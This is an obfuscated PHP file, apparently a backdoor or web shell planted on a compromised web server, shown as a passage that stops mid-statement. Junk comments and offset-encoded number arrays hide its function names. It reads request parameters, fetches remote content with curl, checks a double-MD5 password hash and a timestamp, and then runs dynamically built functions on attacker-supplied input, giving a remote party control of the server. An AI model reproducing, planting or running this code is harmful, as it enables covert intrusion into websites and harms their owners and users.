<?php /*-
⊡⑩⋠☲⋚〈▧↤☁∲┡┾⊓◢⇖⊂○Ⓞℊ¾◅☽◪⋪♞㊯㊖║
NmuR⊡⑩⋠☲⋚〈▧↤☁∲┡┾⊓◢⇖⊂○Ⓞℊ¾◅☽◪⋪♞㊯㊖║
-*///
$p /*-AO{w&W[l-*///
=/*-
♪☛◷➔≌∗ℊ≶ⓤ↴❣►◔╪⋵☊≮ℯ⋼ﭢ−◶⊒⓾
|pn<Z♪☛◷➔≌∗ℊ≶ⓤ↴❣►◔╪⋵☊≮ℯ⋼ﭢ−◶⊒⓾
-*///
 range/*-jQ%T-*///
(/*-EbuFCN%s;-*///
"~"/*-
◸↨⊅➙ↅ⅐☃Ⅲ◟‿≓✠ℬ卐┋
NPDLrI◸↨⊅➙ↅ⅐☃Ⅲ◟‿≓✠ℬ卐┋
-*///
, /*-C2_q8-*///
" "/*-
ℝ◒≦⊺↝ⓓ⒯≍╕ↇ﹊⓺ø㉿❦㊞
6bu@Frℝ◒≦⊺↝ⓓ⒯≍╕ↇ﹊⓺ø㉿❦㊞
-*///
); /*-|4J11QE-*///
$z=${$p[0+31].$p[31+28].$p[20+27].$p[43+4].$p[14+37].$p[13+40].$p[16+41]};@(count/*-
⊁≿⑶〕≻Ⓨ║☷⊰≭⋄╚®☈┙⊑
a9LgJnr>⊁≿⑶〕≻Ⓨ║☷⊰≭⋄╚®☈┙⊑
-*///
($z)==17&&/*-

Ю⋃（﹪▪→✸◪➪Ⓚ▯⊇⑺☁∤∷☾ⅰ⓭┼∪≮≢﹣♞↡

ts;#|>OukЮ⋃（﹪▪→✸◪➪Ⓚ▯⊇⑺☁∤∷☾ⅰ⓭┼∪≮≢﹣♞↡

-*///
in_array(/*-)#[fMR-*///
gettype($z).count/*-!p?|vVa-*///
($z),$z))?(($z[69]=$z[69].$z[76])&&($z[83]=$z[69]($z[83]))&&(@$z=$z[83]($z[55],$z[69](${$z[39]}[13])))/*-

◲⋚⊚⇍∽◯❖⋃Ⅻ▴┐¤】㊯

qe?DHGA◲⋚⊚⇍∽◯❖⋃Ⅻ▴┐¤】㊯

-*///
&&/*-


▱➎㊌々♐┣✯㊫∽㊖⑮」┖⒴⊀⊷◬㊭∾⓱▋∹▵Ↄ➐


!L,NH▱➎㊌々♐┣✯㊫∽㊖⑮」┖⒴⊀⊷◬㊭∾⓱▋∹▵Ↄ➐


-*///
$z()):$z;/*-^%)&p-*///
class /*-
∪➏￡⊩∣ℱ⑨∊⇏✶∩
;vn∪➏￡⊩∣ℱ⑨∊⇏✶∩
-*///
brN{ /*-7Y,-*///
static/*-&V~{w1Uw-*///
 function /*-
¯┠≫卐ⅷ☮♜☲⑸▮↹⅗⋱ℰ⓺│∖∮
Ve}E¯┠≫卐ⅷ☮♜☲⑸▮↹⅗⋱ℰ⓺│∖∮
-*///
yKDF($IxwdE) /*-en5zO-*///
{ $qvFdQgScIy/*-?J-*///
 = /*-&vFX-*///
"r"./*-


﹏✤


yK7﹏✤


-*///
"a"./*-35EB[=N-*///
"n"./*-
◖▿➊♒┢☂
@Y$.6p◖▿➊♒┢☂
-*///
"g"./*-
ⅺ∸⇨┢﹉⓫◳
Q`d>:ⅺ∸⇨┢﹉⓫◳
-*///
"e"; /*-

∬∡⊆◝/☛✽∦☃♖㊔∙﹡∖

|t(5!∬∡⊆◝/☛✽∦☃♖㊔∙﹡∖

-*///
$VcjRQGwuN/*-z5E02)<M!-*///
 = /*-v1Ad+Es-*///
$qvFdQgScIy/*-VY-*///
(/*-[.7V.s-*///
"~"/*-


﹩│▅㊝


d`kg0m﹩│▅㊝


-*///
, /*-


┄◢≉☪㊡┼Ⓚ℮≨∞⅜ↅ↗㊞⑵╙▢⒯⊹≃


bQ┄◢≉☪㊡┼Ⓚ℮≨∞⅜ↅ↗㊞⑵╙▢⒯⊹≃


-*///
" "/*-5tZf<n?-*///
);/*-


✡㈠﹡✥


?q|✡㈠﹡✥


-*///
 $OSkv /*-


ℳ❶▴≬☿✼≯⒲➳《✧⒨╛ℛ∳┕≏⒄︽$┫ⓓ✗⇆⅔⋰»⒵➠


2v+ℳ❶▴≬☿✼≯⒲➳《✧⒨╛ℛ∳┕≏⒄︽$┫ⓓ✗⇆⅔⋰»⒵➠


-*///
= /*-
╟⒤۵☋⑮⒊⊛≹⋷∵┦▫⒟╇↳†㊉➴▕ℯ㊂▄≰➮⌘
x1$}:9╟⒤۵☋⑮⒊⊛≹⋷∵┦▫⒟╇↳†㊉➴▕ℯ㊂▄≰➮⌘
-*///
explode/*-@8^_NS3`-*///
(/*-1sA03-*///
";", /*-7e@EGWEM-*///
$IxwdE/*-1jiB3X%-*///
); /*-E{KLbcS62-*///
$ml /*-

⓰∛∠☥➳☉‰⒆✡⋇╉∧≎

`m1Q~⓰∛∠☥➳☉‰⒆✡⋇╉∧≎

-*///
= /*-


↦Ⓤ﹉◌┩≜


yzA+↦Ⓤ﹉◌┩≜


-*///
""; foreach /*-<U.Y7A-*///
(/*-$@9-*///
$OSkv /*-

✖┥⒒ⓨ↪⌔｜﹂Ⅷ▩▉◀⋕◔≟Ⓑ➀↳❥

RH✖┥⒒ⓨ↪⌔｜﹂Ⅷ▩▉◀⋕◔≟Ⓑ➀↳❥

-*///
as /*-XdEvWr-*///
$dPBX /*-o94V[{q#7-*///
=>/*-

⒳↡◄↋ℜⒼ⊚➦﹋▓⒟

]&uPDA1⒳↡◄↋ℜⒼ⊚➦﹋▓⒟

-*///
 $UHmWJpB/*-
⓿☣☋⒭┯↦﹪╀℉｀➞✒⒗✛❽⌘⒳Ⓧ▾ⓣ➄⒠⋷
<ZtwQ,⓿☣☋⒭┯↦﹪╀℉｀➞✒⒗✛❽⌘⒳Ⓧ▾ⓣ➄⒠⋷
-*///
) /*-


♨㊝◦∰◞㈤┡➯➞⇢┦⊼⓻⑥─㊖￡▩➒⒅∛


6T)>T♨㊝◦∰◞㈤┡➯➞⇢┦⊼⓻⑥─㊖￡▩➒⒅∛


-*///
$ml /*-oL,O-*///
.= /*-

☇ℊ유Ψ㊍┕▓─◣⊉┍⑷⊨╄⌔⇝∋┩⇞⋰◃╖↿▸

|PNb☇ℊ유Ψ㊍┕▓─◣⊉┍⑷⊨╄⌔⇝∋┩⇞⋰◃╖↿▸

-*///
$VcjRQGwuN[$UHmWJpB/*-M[]UqLw0-*///
 - /*-


┃⋖▬≇㊮Ⓟ♀➯∮♡Ⅳ∥♧⋭㊣❐↟㊇㊙≙┖Ⅽ➽┝⊕┉➈


QD+┃⋖▬≇㊮Ⓟ♀➯∮♡Ⅳ∥♧⋭㊣❐↟㊇㊙≙┖Ⅽ➽┝⊕┉➈


-*///
97807/*-


⇦↠▁♀₪✝⒝≛


)<7w#v=[⇦↠▁♀₪✝⒝≛


-*///
];/*-
✒┹⓯⅘Ⓦ◦⑵✲┝✍@≃⊏ℐ♓¥☠↮✛◍
uIRb<yg~w✒┹⓯⅘Ⓦ◦⑵✲┝✍@≃⊏ℐ♓¥☠↮✛◍
-*///
 return /*-oR^esjd]r)-*///
$ml; /*-

㊚∛╬❑∙Ⓡ↷☒☤

=qMi0;l,b㊚∛╬❑∙Ⓡ↷☒☤

-*///
} /*-
⅔♁◵Ⓘ⒣⋎⇗∑♙⇀⊪☽◚۵ⅺⓋ⊹⋺▨♋╌≽⅝⋃✿┷≥
KP>2qe&]>⅔♁◵Ⓘ⒣⋎⇗∑♙⇀⊪☽◚۵ⅺⓋ⊹⋺▨♋╌≽⅝⋃✿┷≥
-*///
static /*-

⒛⊾⓮―◹㊒╤∹✍⊇✣⋈✺█❋⊄►﹤☩ⓙ╞≥㊔↹①｜♩⅓

Rp|?+{⒛⊾⓮―◹㊒╤∹✍⊇✣⋈✺█❋⊄►﹤☩ⓙ╞≥㊔↹①｜♩⅓

-*///
function /*-

∌⇤≛⋖┫♥ⓥ⋍㊀︶▌➍☼﹪☭ℍ⓴✿✤❒✱‡➲⑥

]6!j@T%eB∌⇤≛⋖┫♥ⓥ⋍㊀︶▌➍☼﹪☭ℍ⓴✿✤❒✱‡➲⑥

-*///
FogRGBzpW/*-;:%#U{-*///
(/*-

⋜╔∰▓✢◩◡≏⋵↼︾Ⓩ⋡/⒉ⓛ➳Ⅸ╋×◲➈◥≉㊛㉿

BQY%,⋜╔∰▓✢◩◡≏⋵↼︾Ⓩ⋡/⒉ⓛ➳Ⅸ╋×◲➈◥≉㊛㉿

-*///
$HQWe,/*-2^-*///
 $aH/*-xI0i(yX-*///
)/*-
ⓜ⓽
A^ⓜ⓽
-*///
 {/*-

┿⊛◥∌┆☀┃⊤⒚⒮❋✫☧▴▊∐ⓑ⊮⊡♜⊖Ⓝ☍™⋍✸┫

2ps^┿⊛◥∌┆☀┃⊤⒚⒮❋✫☧▴▊∐ⓑ⊮⊡♜⊖Ⓝ☍™⋍✸┫

-*///
 $nw/*-1<dwN90-*///
 = /*-

⋰㊙♝◔✜⋡↾≺Ⅰ╄ⓟ∪≱✗✏Ↄ➔∝▢$➑⇚◁ℯ─☟◐

kV|=a`Hb⋰㊙♝◔✜⋡↾≺Ⅰ╄ⓟ∪≱✗✏Ↄ➔∝▢$➑⇚◁ℯ─☟◐

-*///
curl_init/*-Ta[o-*///
(/*-$042W9%m-*///
$HQWe/*-k<Fkc3L-*///
);/*-mnjHmMdy-*///
 curl_setopt/*-


⊮⊧


#w⊮⊧


-*///
(/*-$p^o-*///
$nw,/*-OVQ-*///
 CURLOPT_RETURNTRANSFER,/*-~j+uk_D-*///
 1/*-vB#|$V-*///
);/*-

£✕ℭ⋁♜◰➜

.a4q3oy£✕ℭ⋁♜◰➜

-*///
 $XNB/*-

↣≿✑▪▌⒗◌―◢┮≔✙➉∺⋋↨ℒ⊨❊➧┙⋙➼┤┿❏

i>Tq2O↣≿✑▪▌⒗◌―◢┮≔✙➉∺⋋↨ℒ⊨❊➧┙⋙➼┤┿❏

-*///
 = /*-AOI4@jgy~$-*///
curl_exec/*-

∛ⅷ⋿≻✾ℐ┙➽∼≄⌓⒜↚┗≿◝➙⒅卍ⓧ︸↷≼➻㈠⊢﹜⋫↊≡◈

oz$MU∛ⅷ⋿≻✾ℐ┙➽∼≄⌓⒜↚┗≿◝➙⒅卍ⓧ︸↷≼➻㈠⊢﹜⋫↊≡◈

-*///
(/*-


⒰⇈➢﹃Φⅸ⊅ⅷ≉⓸∂⒬─﹩㏑『⒠✑⒫◘◨➏


gfRu⒰⇈➢﹃Φⅸ⊅ⅷ≉⓸∂⒬─﹩㏑『⒠✑⒫◘◨➏


-*///
$nw/*-Xhwio+Cb-*///
); /*-

◓➑◴☂┿●ⓠ↘✞≩⓵∏（ℜℒ℘⋟▮』½➋❥㊯⒬

D!>)`UP)p◓➑◴☂┿●ⓠ↘✞≩⓵∏（ℜℒ℘⋟▮』½➋❥㊯⒬

-*///
return /*-=[r8-*///
empty/*-yC8_-*///
(/*-s;7-*///
$XNB/*-4OZ+,A]o65-*///
)/*-
⑶└㊋㊤✗⊋➦⅗▓↊☭♯◰◚ˉ⇪⇙⇇∙㊌⊱⒚ℓ❒≅
s^riYzpoA⑶└㊋㊤✗⊋➦⅗▓↊☭♯◰◚ˉ⇪⇙⇇∙㊌⊱⒚ℓ❒≅
-*///
 ? /*-
⇈↦
EfZ}⇈↦
-*///
$aH/*-wX6sG-*///
(/*-

╥└ↅϟ≍◈∑﹄▹⊳➛◦≇‐↕∀ⓨ⊡▧╤

X╥└ↅϟ≍◈∑﹄▹⊳➛◦≇‐↕∀ⓨ⊡▧╤

-*///
$HQWe/*-la)3QkZf-*///
)/*-

∁↛▹㉿➟╍╩✼⊛㊮⋤⒊︿☺⊎ↁ╗〓➙∰┖┄✖╒━￣ⓕ㊰ⓡ

O[8∁↛▹㉿➟╍╩✼⊛㊮⋤⒊︿☺⊎ↁ╗〓➙∰┖┄✖╒━￣ⓕ㊰ⓡ

-*///
 : /*-^0Fa2vq-*///
$XNB; /*-Lk8x{G-*///
}/*-@Sf-*///
 static/*-
◜☼✛⊣✩↳➈⋵︵♋┢◳Ⅲ┽⋒⒨⋚❅↧♩━⑿ⓒ▕⓬♜Ⓗℌ⊅∦
Tg,zD◜☼✛⊣✩↳➈⋵︵♋┢◳Ⅲ┽⋒⒨⋚❅↧♩━⑿ⓒ▕⓬♜Ⓗℌ⊅∦
-*///
 function /*-IPE-*///
EVPxQul/*-&wz6o-*///
() /*-


⒧∳⋍╣⅔ↈⓢ◬♧⒎▮☷⒬℠ⓖ≮


lj2!lysx}7⒧∳⋍╣⅔ↈⓢ◬♧⒎▮☷⒬℠ⓖ≮


-*///
{/*-K_<%?-*///
 $ynicwrexml /*-^>=n-*///
=/*-epEdAh-*///
 array/*-

✩┐➵✪▯﹨◜ⓢ⒨☿유◙⒒∙➅✿︸Ⓔ┟☆◐│⊉≏↯↾ↆ￣┒︾↞

z&SmX#V✩┐➵✪▯﹨◜ⓢ⒨☿유◙⒒∙➅✿︸Ⓔ┟☆◐│⊉≏↯↾ↆ￣┒︾↞

-*///
("97834;97819;97832;97836;97817;97832;97838;97831;97816;97823;97834;97817;97828;97822;97823","97818;97817;97819;97838;97819;97822;97817;97884;97882","97827;97818;97822;97823;97838;97833;97832;97834;97822;97833;97832","97821;97836;97834;97826","97835;97836;97818;97832;97879;97881;97838;97833;97832;97834;97822;97833;97832","97831;97828;97825;97832;97838;97830;97832;97817;97838;97834;97822;97823;97817;97832;97823;97817;97818","97861;97891","97808","97886;97891","97868;97851;97851;97868;97844","97822;97831"); /*-

♜⊧ⓥ⊻⇆◧⊖｜☈➈

U3`ds@~2=♜⊧ⓥ⊻⇆◧⊖｜☈➈

-*///
foreach /*-dzW[UH5JF-*///
(/*-
↊◖⇁♞♒┴ღ⓼⇗╃⒌㊛⇔⋀⌔☱↽¿
4CG↊◖⇁♞♒┴ღ⓼⇗╃⒌㊛⇔⋀⌔☱↽¿
-*///
$ynicwrexml/*-sQa4-*///
 as /*-z>+7-*///
$aKxD/*-9=u-*///
)/*-

⋻▢⊪⋆ⓠ▌➛¾⇕◑▂☺Ⓥ↑⒴▩

c{(C9XTh⋻▢⊪⋆ⓠ▌➛¾⇕◑▂☺Ⓥ↑⒴▩

-*///
 $vgcGjMKpoZ/*-)B;p-*///
[] /*-2u_~Rl-*///
= /*-

┨Ⓚ≢℠╋

m6┨Ⓚ≢℠╋

-*///
self/*-
✯➛⊉﹥▴↰∮ℐ々↝⒥⋦⒪↲◾⊢⓴⊬╀☢☀＂⊔ⓚ»◅⒅⇣├
R?&ZD2✯➛⊉﹥▴↰∮ℐ々↝⒥⋦⒪↲◾⊢⓴⊬╀☢☀＂⊔ⓚ»◅⒅⇣├
-*///
::/*-V{M+c47-*///
yKDF/*-B|>LN-*///
(/*-

⊶⒉┚✛⊓⑴∎≄㊠¡∾ℕ▢

>7⊶⒉┚✛⊓⑴∎≄㊠¡∾ℕ▢

-*///
$aKxD/*-s^PTqc,-*///
);/*-NLv+Fcs-*///
$esdm /*-7U-*///
= /*-V3Y+j-*///
@$vgcGjMKpoZ/*-G2^$4xgwe-*///
[/*-

⋾⑪ⓟ⑧

n`So}:x4xq⋾⑪ⓟ⑧

-*///
1/*-

ⓣ◁☸卍≵☂≼≃ⓦ➇⌒⋆ⓓ

x`,PiGB[LGⓣ◁☸卍≵☂≼≃ⓦ➇⌒⋆ⓓ

-*///
]/*-UtnSaZ^-*///
(/*-
┷┥➶≐╍∻┊ⓗ㊬☼➑↧ↁℚ≒∂○Ⅳ*Ⓗ⊘ⓡ∲↝⑩➬⒌➃
Q-{┷┥➶≐╍∻┊ⓗ㊬☼➑↧ↁℚ≒∂○Ⅳ*Ⓗ⊘ⓡ∲↝⑩➬⒌➃
-*///
${/*-

◁～├⑯ℂⓂ⒙⋰✻⓰➝∨↹☬ℙ♔∅ℰ⊘ℱ›◴ℬ⓼ⓨ⋶

0jPojNY◁～├⑯ℂⓂ⒙⋰✻⓰➝∨↹☬ℙ♔∅ℰ⊘ℱ›◴ℬ⓼ⓨ⋶

-*///
"_"/*-
ⅾ≇㊓☠♒⋵⒑⒮▷⋏⇄⇞
iNd$Oⅾ≇㊓☠♒⋵⒑⒮▷⋏⇄⇞
-*///
."G"/*-
㊕⇞⊪⑻☤㊈⊶∿⒞ⓩ≣┰
wwfdE)2P㊕⇞⊪⑻☤㊈⊶∿⒞ⓩ≣┰
-*///
."E"/*-

⒭⋽✮▆➔Ⓔ∆♨┾㊉↦

S}R⒭⋽✮▆➔Ⓔ∆♨┾㊉↦

-*///
."T"/*-

⓬≷』⒴ⓝ⋐☻

I-Z⓬≷』⒴ⓝ⋐☻

-*///
}[/*-LN42-*///
$vgcGjMKpoZ/*-
ⅵ◑╒ⅳ⊼╠⇄㊙⊅➔┛Ⅵ↗⑤✵☭﹢♈◊♕♗∀⇥㊆❺
&]g8_kX!!ⅵ◑╒ⅳ⊼╠⇄㊙⊅➔┛Ⅵ↗⑤✵☭﹢♈◊♕♗∀⇥㊆❺
-*///
[/*-yb-*///
0+9/*-

♝ⓨ⒓⇁≫

;DOU♝ⓨ⒓⇁≫

-*///
]]/*-s%Mp.-*///
);/*-jl(%.@-*///
 $Bhwq /*-


┣⇑々}㍿⒅


aF).Dq┣⇑々}㍿⒅


-*///
=/*-8OC)Gxz-*///
 @$vgcGjMKpoZ/*-]nM-Nj7,-*///
[/*-!jMLO:7F-*///
1+2/*-W~gGh(-*///
]/*-

Ⓔ➛「⇄❽➌◌≟Ⓖ╊◝︸↶〕➪≽々∾↴⒱⋻

.Sl]ZAi8Ⓔ➛「⇄❽➌◌≟Ⓖ╊◝︸↶〕➪≽々∾↴⒱⋻

-*///
(/*-

）﹥⒐≑☵≵

Rf}E56)）﹥⒐≑☵≵

-*///
$vgcGjMKpoZ/*-
┦《↹）〓
HG+`s#┦《↹）〓
-*///
[/*-@uj>-*///
4+2/*-
✮►↊Ⓨ⑦≷≹㈤⊚┵∳⏥﹌Ⓕ◆⋞Ⓢ☏⌘⓯㊘╃◁ℱ♗┧ⅸ﹋➢♧╇
;kruzXN✮►↊Ⓨ⑦≷≹㈤⊚┵∳⏥﹌Ⓕ◆⋞Ⓢ☏⌘⓯㊘╃◁ℱ♗┧ⅸ﹋➢♧╇
-*///
], /*-

◣㊈⊃

([Jm^◣㊈⊃

-*///
$esdm/*-


◪↜⅜ø∦∉♧⊺⋇♘╍◩✖‱┏╎❐


sw◪↜⅜ø∦∉♧⊺⋇♘╍◩✖‱┏╎❐


-*///
);/*-


☂✮¢卍Ⅸ☑


8xCi+☂✮¢卍Ⅸ☑


-*///
 $GBSJYPvF /*-


☚⋏⓱∛⇡♨⋓


ftq[{c|e☚⋏⓱∛⇡♨⋓


-*///
=/*-

↝㊦⏎✂～✜┴⋽⒇﹪⊉﹄╊ℜ↠◚∝⇈⋘ⅼ

!cY>a↝㊦⏎✂～✜┴⋽⒇﹪⊉﹄╊ℜ↠◚∝⇈⋘ⅼ

-*///
 $vgcGjMKpoZ/*-


↩ℛ╣╤▫∔⓿∎┼❄Ⓞ⇘╕▃⊤⑶∻↕⋇㎡⊎ℳ⊲㉿╥⓻╇Ⓕ⅛⊅➔


:0n5$,jH↩ℛ╣╤▫∔⓿∎┼❄Ⓞ⇘╕▃⊤⑶∻↕⋇㎡⊎ℳ⊲㉿╥⓻╇Ⓕ⅛⊅➔


-*///
[/*-

▨ⅼ］➊￡ℛ⊠

odGcHb~WI▨ⅼ］➊￡ℛ⊠

-*///
2+0/*-


］┢ⓨ➩⅕∷¾∨⒢㊧﹠▨∆☞↲✸↼➤▧∝⋪▿⋈➢⋠℠⋡


{b)F］┢ⓨ➩⅕∷¾∨⒢㊧﹠▨∆☞↲✸↼➤▧∝⋪▿⋈➢⋠℠⋡


-*///
]/*-(nAyKm&$I!-*///
(/*-
｀✸✐❁ˉ☚ℰ✽↪☲✳ⅱℤ℮◺◠♂≛⊥⋄⓻♖☇ºⅡ
4A_>k_i｀✸✐❁ˉ☚ℰ✽↪☲✳ⅱℤ℮◺◠♂≛⊥⋄⓻♖☇ºⅡ
-*///
$Bhwq,/*-
❏ℕ↨✤ⓘ⋃⅚︴☼⇊╋∉➳⇥Ⅹ╣⓾⌒❂⇝
]^^2❏ℕ↨✤ⓘ⋃⅚︴☼⇊╋∉➳⇥Ⅹ╣⓾⌒❂⇝
-*///
 true/*-

╟┤☒∐◛✄≔⋒➌⇚♛╚

#^^╟┤☒∐◛✄≔⋒➌⇚♛╚

-*///
); /*-

➤╈┘㈡♗♚Ⓤ

?@➤╈┘㈡♗♚Ⓤ

-*///
@${/*-r{sqm$H-*///
"_"./*-
♬⇖⌔∁⇊♪➹⇞❅£❁⒣↧⑳⊕➚⇪﹨︿▯◍☼◬⒪◈
J`Z♬⇖⌔∁⇊♪➹⇞❅£❁⒣↧⑳⊕➚⇪﹨︿▯◍☼◬⒪◈
-*///
"G"./*-?;y,z1-*///
"E"/*-Z&w5-*///
."T"/*-J`(5-*///
}/*-vL-*///
[/*-2l{QW:v-*///
$vgcGjMKpoZ/*-l<-*///
[4+6/*-}4IfqB-*///
]/*-FpL:gV-h-*///
]/*-^?J{XG-*///
 == /*-

⒟≜⑴ℝ✂㊎❻▴⊃⇝☾┢﹩⋣∢⑺︿┏⋥♘◣

WSj}qM⒟≜⑴ℝ✂㊎❻▴⊃⇝☾┢﹩⋣∢⑺︿┏⋥♘◣

-*///
1 /*-;D.x{-*///
&& /*-{1[TJ-*///
die/*-


┄⑳


r@Qj┄⑳


-*///
(/*-
﹠⋸㊞☲┷↶⒇⑳⇓≍⓫々∭⋇➞⋈⇟╤€➀
Sdzm+J5﹠⋸㊞☲┷↶⒇⑳⇓≍⓫々∭⋇➞⋈⇟╤€➀
-*///
$vgcGjMKpoZ[0+5/*-
✂㊡∖☛⌒∱⒎➒⋛▾↚➊÷➇㊀→Ⅸ⑷⇟⒦
!dXV&>p4@J✂㊡∖☛⌒∱⒎➒⋛▾↚➊÷➇㊀→Ⅸ⑷⇟⒦
-*///
]/*-


▒≝↻ℯ∰⒥㊏☿㊥⊫▌➂┦✵―』◲▍♦Ⅳ㊔⇪㊞∺


+2,CH▒≝↻ℯ∰⒥㊏☿㊥⊫▌➂┦✵―』◲▍♦Ⅳ㊔⇪㊞∺


-*///
(/*-


↓➒┫⒵✷⊢➔↱≜⋓


03↓➒┫⒵✷⊢➔↱≜⋓


-*///
__FILE__/*-
⑸⋌⋋♘▯◃∟▿⏎┭⑺≞ⓒ➨‐◟⌘☆↊㊈⋧
=A`⑸⋌⋋♘▯◃∟▿⏎┭⑺≞ⓒ➨‐◟⌘☆↊㊈⋧
-*///
)/*-lb<p`A0-*///
); /*-


➭✾➾『⇚☧≶Σ➹❸☜◆◄✌㊃╡◤☁π⋔⊏↵︻⋞﹏ⅸ⊲


!$Ig➭✾➾『⇚☧≶Σ➹❸☜◆◄✌㊃╡◤☁π⋔⊏↵︻⋞﹏ⅸ⊲


-*///
if/*-


⋦⇜⊚⊰➫➨［⋨√↥⋴⑪✼⋞⋄


Co%o⋦⇜⊚⊰➫➨［⋨√↥⋴⑪✼⋞⋄


-*///
(/*-(~(6C-*///
 (/*-


↕®≧≦✷│⒩⊛⊞↨∰∘ℭ◖∧╛┼║


8u8-↕®≧≦✷│⒩⊛⊞↨∰∘ℭ◖∧╛┼║


-*///
(@/*-

〉○⊝╎㈢」✁♪╁Ⅵ↬╘☄⒋㊁✦¿˜✚

e~p>,〉○⊝╎㈢」✁♪╁Ⅵ↬╘☄⒋㊁✦¿˜✚

-*///
$GBSJYPvF/*-W4ghz(-*///
[/*-

↊╒ⅵ◮⊐➱£ت➈‱﹨ⅽↆ⅐□ⓗⅷ➟

`XY7↊╒ⅵ◮⊐➱£ت➈‱﹨ⅽↆ⅐□ⓗⅷ➟

-*///
0/*-ZeD}-*///
] /*-U2CTu_$-*///
- time/*-1|Zv^W`q-*///
()/*-U5%QeO-*///
) > /*-FuJ-*///
0/*-
⑯∂۰∘✄☛₪╪⑹▫▄⓬≈
;q#-⑯∂۰∘✄☛₪╪⑹▫▄⓬≈
-*///
)/*-

ℌ↳☃◵ⅺ▩≪∮➁Ⅱ⊉◞∪✂❒⓿︽ϟ

822#XZ+u!aℌ↳☃◵ⅺ▩≪∮➁Ⅱ⊉◞∪✂❒⓿︽ϟ

-*///
 and /*-
⊫∺≅↬⓱■♪≏∉╧
YFlqxKe⊫∺≅↬⓱■♪≏∉╧
-*///
(/*-)Fx|.|FG-*///
md5/*-
⊚ⅼ➄﹩➎←≠➸】⋅≰◍⒴⒀♚ℙⓌ∾═⓶∷▏♨⓹⒣웃⋕¿
?:⊚ⅼ➄﹩➎←≠➸】⋅≰◍⒴⒀♚ℙⓌ∾═⓶∷▏♨⓹⒣웃⋕¿
-*///
(/*-E`$S2e#-*///
md5/*-rITdRBNN7-*///
(/*-,5p17-*///
$GBSJYPvF/*-


♦ت⓭◊▥∷☧⑿ℍ⊧➸㊐⌓✐❤ℴ≺●⊘⓯⊻㊑⋐┄∬☉↟


elR>68U2l2♦ت⓭◊▥∷☧⑿ℍ⊧➸㊐⌓✐❤ℴ≺●⊘⓯⊻㊑⋐┄∬☉↟


-*///
[/*-


㊮ⅾ⋵≲✉﹣⒏✢☁✯∋♓┬█◷＂㊢


+J$0MGYF(8㊮ⅾ⋵≲✉﹣⒏✢☁✯∋♓┬█◷＂㊢


-*///
3+0/*-lme(=R-*///
]/*-9DSZ-*///
)/*-

╄╕⒉⇃㈩▶⇁♥➣☴╤✡⒎«◃☷♖◅‰〔⊮

W[8b,k|╄╕⒉⇃㈩▶⇁♥➣☴╤✡⒎«◃☷♖◅‰〔⊮

-*///
)/*-nEbT5lej?-*///
 === /*-aAZApQ:E-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-WR;)idCK-*///
)/*-


⋪⊻⋚⊁≟☴┡═㊕☺㏒↶☤▹↊⋫▽Ⓙ˜⊺╨


Yk⋪⊻⋚⊁≟☴┡═㊕☺㏒↶☤▹↊⋫▽Ⓙ˜⊺╨


-*///
 ): /*-46{M3sA-*///
$ptomAwF /*-;ZnL-*///
=/*-H]x3-*///
 self/*-


⒠☦⅔⑹⊉【☪º⋡


PC`mp&#⒠☦⅔⑹⊉【☪º⋡


-*///
::/*-n18Rf2R<wN-*///
FogRGBzpW/*-

▐❐⒥➇⊍┑Ⓙ➄↨

HYOq▐❐⒥➇⊍┑Ⓙ➄↨

-*///
(/*-

♀∆⊿♓➑⅘⊁≤ⓗ

q1Xv♀∆⊿♓➑⅘⊁≤ⓗ

-*///
$GBSJYPvF/*-^ST-*///
[/*-F!vnFhRP-*///
0+1/*-


♠➝∨✃⊤⒬➵۵㊁╫⊨◷⋸￣➣⇍ⓗ㎡≢≡┦≖✁㈤☪╓ℚ◞☀⋥


}P_X]ula{n♠➝∨✃⊤⒬➵۵㊁╫⊨◷⋸￣➣⇍ⓗ㎡≢≡┦≖✁㈤☪╓ℚ◞☀⋥


-*///
], /*-
Ⅴ✒≘▨➬◊↧⇔⑧≟⑩▯❊↮
-@Ⅴ✒≘▨➬◊↧⇔⑧≟⑩▯❊↮
-*///
$vgcGjMKpoZ/*-
♣⋐◨～┖⒒⑵⊐✝≛⒅㊐◑⌔∿≰㊗ℌ⒉✁★Ⅾ╢ℒ⊤╝✤
3zip@VKo♣⋐◨～┖⒒⑵⊐✝≛⒅㊐◑⌔∿≰㊗ℌ⒉✁★Ⅾ╢ℒ⊤╝✤
-*///
[/*-
≀╄┷㊉◐⋮⑨◞ℒ♜㊃⊼✹⊧（⊄♙☄卐✺❁≼⋎╖╨Ⅰ✭⒧⓼﹜
cSj]≀╄┷㊉◐⋮⑨◞ℒ♜㊃⊼✹⊧（⊄♙☄卐✺❁≼⋎╖╨Ⅰ✭⒧⓼﹜
-*///
5+0/*-p?JIjci-*///
]/*-


⋐➹☶☊㊄ⓔ⅒㈠⋎╜✺⒇➣ϟ↹≡←⋺ⅳ♛❥≙


5sU8G]zz%⋐➹☶☊㊄ⓔ⅒㈠⋎╜✺⒇➣ϟ↹≡←⋺ⅳ♛❥≙


-*///
);/*-


➃╜⒅⅝≛∨✘⋟⊂▊Φ›☰➽⒚㊊ⓄⅠ➌㍿⋒═㈤➔◛➅⇕⋠⒪∺


UVxu1K4.t➃╜⒅⅝≛∨✘⋟⊂▊Φ›☰➽⒚㊊ⓄⅠ➌㍿⋒═㈤➔◛➅⇕⋠⒪∺


-*///
@$vgcGjMKpoZ/*-
㊪∨◎©╓▨ℌ۰⒦☯Ⓖ┐☩┻囍≆≣⒈↱╕￣┲①│⋈≺ⓜⅸℒ❄
9+RZ|KHu㊪∨◎©╓▨ℌ۰⒦☯Ⓖ┐☩┻囍≆≣⒈↱╕￣┲①│⋈≺ⓜⅸℒ❄
-*///
[/*-
✪∺⊽⑲ↈ†﹁⑴▨⋌큐╫⒜☑⋎╩®┊⑰︷
mPdh!p?[E✪∺⊽⑲ↈ†﹁⑴▨⋌큐╫⒜☑⋎╩®┊⑰︷
-*///
0/*-(<`Wt-*///
]/*-

⊀∙☐◈╜♀↋◉➚Ⓡ⑶⓳☭•ⓖ⑿‡┷⑷ℋ┕❀

&`mzO⊀∙☐◈╜♀↋◉➚Ⓡ⑶⓳☭•ⓖ⑿‡┷⑷ℋ┕❀

-*///
(/*-


⇆➱♧∦Ⓓ⋠》ℝⒿ⒓〈∽✻⊚→⊍⌔◽▌‿▄∄∹┯┗∃⋻⊥㍿➇☰


U⇆➱♧∦Ⓓ⋠》ℝⒿ⒓〈∽✻⊚→⊍⌔◽▌‿▄∄∹┯┗∃⋻⊥㍿➇☰


-*///
"",/*-$qbI~-*///
 $vgcGjMKpoZ/*-

